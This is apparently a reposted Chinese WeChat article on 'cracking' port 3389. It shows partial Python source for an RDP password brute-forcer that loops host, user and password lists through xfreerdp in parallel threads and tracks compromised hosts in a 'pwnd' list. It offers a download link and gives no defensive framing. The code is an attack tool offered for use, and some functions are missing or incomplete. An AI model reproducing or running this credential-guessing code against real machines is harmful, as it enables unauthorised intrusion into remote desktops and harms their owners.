部分源代码
自定义扫描的端口、线程、时间
config = configparser.ConfigParser()
config.read('config.ini')
rdp_port = config.getint('PORTS', 'ports_to_scan')
timeout_seconds = config.getint('PORTS', 'timeout_seconds')
max_threads = config.getint('PORTS', 'threads')
hosts_file = "host.txt"
users_file = "user.txt"
passwords_file = "pass.txt"
pwnd = list()
def run_command(command, timeout_seconds):
try:
p = subprocess.run(command.split(' '),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=timeout_seconds,
text=True)
output = p.stdout
except subprocess.TimeoutExpired:
output = "PROCESS_TIMEOUT"
return output
def crack(host, username, password):
command = "xfreerdp /u:" + username + " /v:" + host + ":" + str(rdp_port) + " /p:" + password
output = run_command(command, timeout_seconds)
total_iterations = len(hosts) * len(users) * len(passwords)
progress_bar = tqdm(total=total_iterations, desc="Progress")
with concurrent.futures.ThreadPoolExecutor(max_threads) as executor:
for h in hosts:
for u in users:
for p in passwords:
if h in pwnd:
continue
executor.submit(crack, h, u, p).add_done_callback(update_progress)
下载地址:
原文始发于微信公众号(7维空间):2025年如何破解3389?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论